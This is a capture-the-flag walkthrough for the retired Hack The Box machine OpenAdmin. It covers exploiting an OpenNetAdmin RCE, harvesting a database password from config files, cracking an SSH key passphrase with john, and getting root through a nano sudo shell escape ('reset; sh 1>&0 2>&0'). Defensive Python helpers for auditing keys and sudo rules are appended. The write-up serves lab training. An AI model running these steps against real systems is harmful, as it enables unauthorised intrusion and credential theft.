HTB Walkthrough: OpenAdmin w/o Metasploit (retired)

OpenAdmin is a retired box on HTB and is part of TJ Null’s OSCP-like boxes.

Hostname: OpenAdmin | Difficulty Level: Easy | Operating System: Linux

└─# nmap -sC -sV -oA OpenAdmin
Starting Nmap 7.91 ( ) at 2021-06-01 18:22 EDT
Nmap scan report for
Host is up (0.030s latency).
Not shown: 998 closed ports
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Add ‘openadmin.htb’ to /etc/hosts. Browsing to http://openadmin.htb/ona/ reveals an ‘Open Net Admin’ portal; you are logged in by default as guest. The version shown is ‘OpenNetAdmin — v18.1.1’, so we look for an OpenNetAdmin exploit.
└─# searchsploit Open Net Admin
OpenNetAdmin 18.1.1 — Remote Code Execution.
└─# searchsploit -m php/webapps/

Removing carriage returns
└─# cat | tr -d '\r' >>
Exploiting and getting a reverse shell back.
└─# ./ http://openadmin.htb/ona/
$ whoami

$ grep -Ri "password" config
config/auth_ldap.config.php://$conf['auth']['ldap']['bindpw'] = 'mysecretbindpassword';

Looking for users:

$ cat /etc/passwd
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false

We need to know the file path to view the contents.

$ ls config

Reviewing ‘config/’ shows that another config folder exists within the ‘local’ folder.

$ cat config/

$ cat local/config/
array (
'db_type' => 'mysqli',
'db_host' => 'localhost',
'db_login' => 'ona_sys',
'db_passwd' => 'n1nj4W4rri0R!',
'db_database' => 'ona_default',
'db_debug' => false,

Using the above db password, you can SSH in as the ‘jimmy’ user. We need to escalate our privileges to joanna for the user flag.

jimmy@openadmin:/var/www/internal$ cat index.php
if ($_POST['username'] == 'jimmy' && hash('sha512',$_POST['password']) == '00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1')

jimmy@openadmin:/var/www/internal$ cat main.php
<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); };
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session

From the above script, main.php will probably display the SSH key once you log in through the index.php page. Looking for more info on what exactly to browse. As it is present inside ‘internal’

jimmy@openadmin:/var/www/html$ ss -ln | grep LISTEN
tcp LISTEN 0 80*
tcp LISTEN 0 128*
tcp LISTEN 0 128*

From the above, we should try SSH port forwarding.
└─# ssh -L 52846: jimmy@ -N

Browse to the forwarded address and log in with jimmy/Revealed; you will get in. The page displays the SSH key belonging to joanna, as seen in ‘/var/www/internal/main.php’.

Save the private key on Kali as id_rsa. Let us extract the passphrase from the private key.
(a) Create a john-compatible hash and save the output in a file (id_john)
└─# python /usr/share/john/ id_rsa
(b) Crack the passphrase

└─# john id_john --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press ‘q’ or Ctrl-C to abort, almost any other key for status
bloodninjas (id_rsa)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:07 DONE (2021-06-03 17:56) 0.1321g/s 1894Kp/s 1894Kc/s 1894KC/s a6_123..*7¡Vamos!
Session completed
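The john output above reports KDF cost 0 (MD5/AES) and an iteration count of 1, which is why a rockyou passphrase falls in seconds: a legacy PEM key derives its AES key from the passphrase with a single MD5 round, whereas the OpenSSH key format runs bcrypt for many rounds (typically 16). The following Python helper is added here and is not part of the original post; `classify_private_key`, `make_openssh_header` and the sample keys are hypothetical names and constructed inputs (not real keys), and it reads only the key header to report which KDF protects the passphrase.

```python
import base64
import struct

# Added helper for this walkthrough (hypothetical, not from the original post): reads an
# SSH private key header and reports which passphrase KDF protects it.
LEGACY_HEADER = "-----BEGIN RSA PRIVATE KEY-----"
OPENSSH_HEADER = "-----BEGIN OPENSSH PRIVATE KEY-----"

def _read_string(buf: bytes, pos: int):
    """Read one SSH wire 'string': uint32 big-endian length, then that many bytes."""
    (length,) = struct.unpack(">I", buf[pos:pos + 4])
    return buf[pos + 4:pos + 4 + length], pos + 4 + length

def classify_private_key(pem: str) -> dict:
    lines = [ln.strip() for ln in pem.strip().splitlines()]
    if lines[0] == LEGACY_HEADER:
        # Legacy PEM: a 'DEK-Info' header means EVP_BytesToKey (MD5, one iteration), the
        # "Cost 1 ... is 0" / "iteration count ... is 1" case john reports above.
        dek = next((ln.split(":", 1)[1].strip() for ln in lines if ln.startswith("DEK-Info:")), None)
        if dek is None:
            return {"format": "pem", "cipher": "none", "kdf": "none", "rounds": 0}
        return {"format": "pem", "cipher": dek.split(",")[0], "kdf": "md5", "rounds": 1}
    if lines[0] == OPENSSH_HEADER:
        body = base64.b64decode("".join(lines[1:-1]))
        if not body.startswith(b"openssh-key-v1\x00"):
            raise ValueError("bad openssh-key-v1 magic")
        cipher, pos = _read_string(body, len(b"openssh-key-v1\x00"))
        kdf, pos = _read_string(body, pos)
        kdfopts, pos = _read_string(body, pos)   # for bcrypt: string salt, uint32 rounds
        rounds = 0
        if kdf == b"bcrypt":
            _salt, p = _read_string(kdfopts, 0)
            (rounds,) = struct.unpack(">I", kdfopts[p:p + 4])
        return {"format": "openssh", "cipher": cipher.decode(), "kdf": kdf.decode(), "rounds": rounds}
    raise ValueError("unrecognised private key header")

# Constructed sample (not a real key): legacy PEM headers as written by older ssh-keygen.
LEGACY_SAMPLE = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF
AAAA
-----END RSA PRIVATE KEY-----"""

def make_openssh_header(cipher: bytes, kdf: bytes, rounds: int) -> str:
    """Build only the leading fields of an openssh-key-v1 blob (constructed, unusable as a key)."""
    s = lambda b: struct.pack(">I", len(b)) + b
    opts = s(b"\x00" * 16) + struct.pack(">I", rounds) if kdf == b"bcrypt" else b""
    blob = b"openssh-key-v1\x00" + s(cipher) + s(kdf) + s(opts)
    return f"{OPENSSH_HEADER}\n{base64.b64encode(blob).decode()}\n-----END OPENSSH PRIVATE KEY-----"
```

A key whose result is anything other than `kdf == "bcrypt"` should be re-encrypted with `ssh-keygen -p -o -a 16` (or newer) so an offline guess costs bcrypt work instead of one MD5.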

SSH into the box using joanna’s passphrase and SSH key.
└─# ssh -i id_rsa joanna@openadmin.htb

Note: SSH will refuse the key (“permissions are too open”) and you will get access denied if the key file permissions are too open. Use ‘chmod 600 <private key>’.

You will get the user flag.

Checking for sudo privileges

joanna@openadmin:~$ sudo -l
Matching Defaults entries for joanna on openadmin:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User joanna may run the following commands on openadmin:
(ALL) NOPASSWD: /bin/nano /opt/priv

As we can see, nano can be used to attain root privileges via sudo. Google ‘nano gtfobins’ and refer to this link:
We are going to follow the steps in the ‘Sudo’ section, as we are exploiting sudo privileges.
joanna@openadmin:~$ sudo /bin/nano /opt/priv

In the file, press ‘CTRL+R’, then ‘CTRL+X’.

At the bottom, a small prompt opens asking for a command to execute. Enter the following:
reset; sh 1>&0 2>&0

You will get a root shell and the root flag.
Note: The shell appears right after the command. You will see a ‘#’ prompt once the exploit is successful.
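The sudoers rule above pins nano to /opt/priv, yet nano’s execute-command prompt (CTRL+R, CTRL+X) still spawns a shell as root, so restricting the argument is not a mitigation; the defender’s fix is to grant sudoedit for the file instead of an interactive editor. The following Python audit helper is added here and is not part of the original post: `parse_sudo_rules` and `risky_editor_rules` are hypothetical names, and SAMPLE is a constructed `sudo -l` transcript mirroring the box (with one harmless rule added for contrast).

```python
import re
from pathlib import PurePosixPath

# Added audit helper for this walkthrough (hypothetical, not from the original post): scans
# `sudo -l` output for rules that hand an interactive editor or pager to sudo. Such programs
# can run a shell from inside, so a pinned file argument such as /opt/priv does not contain them.
SHELL_ESCAPE_EDITORS = {"nano", "vim", "vi", "view", "less", "more", "man", "emacs", "ed"}

# One rule line: "(runas) [TAG: ...] /path/cmd args[, /path/cmd2 args]"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

def parse_sudo_rules(sudo_l_output: str):
    """Return [(runas, nopasswd, command, args)] from the 'may run the following' section."""
    rules = []
    in_rules = False
    for line in sudo_l_output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            parts = cmd.strip().split()
            if parts:
                rules.append((m.group("runas").strip(), nopasswd, parts[0], parts[1:]))
    return rules

def risky_editor_rules(sudo_l_output: str):
    """Rules whose command is a shell-escaping editor; remediate with sudoedit, not an argument pin."""
    return [r for r in parse_sudo_rules(sudo_l_output)
            if PurePosixPath(r[2]).name in SHELL_ESCAPE_EDITORS]

# Constructed sample mirroring the sudo -l output above, plus one benign rule for contrast.
SAMPLE = """\
Matching Defaults entries for joanna on openadmin:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv
    (root) /usr/bin/systemctl status nginx
"""

if __name__ == "__main__":
    for runas, nopasswd, cmd, args in risky_editor_rules(SAMPLE):
        print(f"RISK: ({runas}) {'NOPASSWD: ' if nopasswd else ''}{cmd} {' '.join(args)}"
              f" allows a shell escape; grant 'sudoedit {' '.join(args)}' instead")
```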
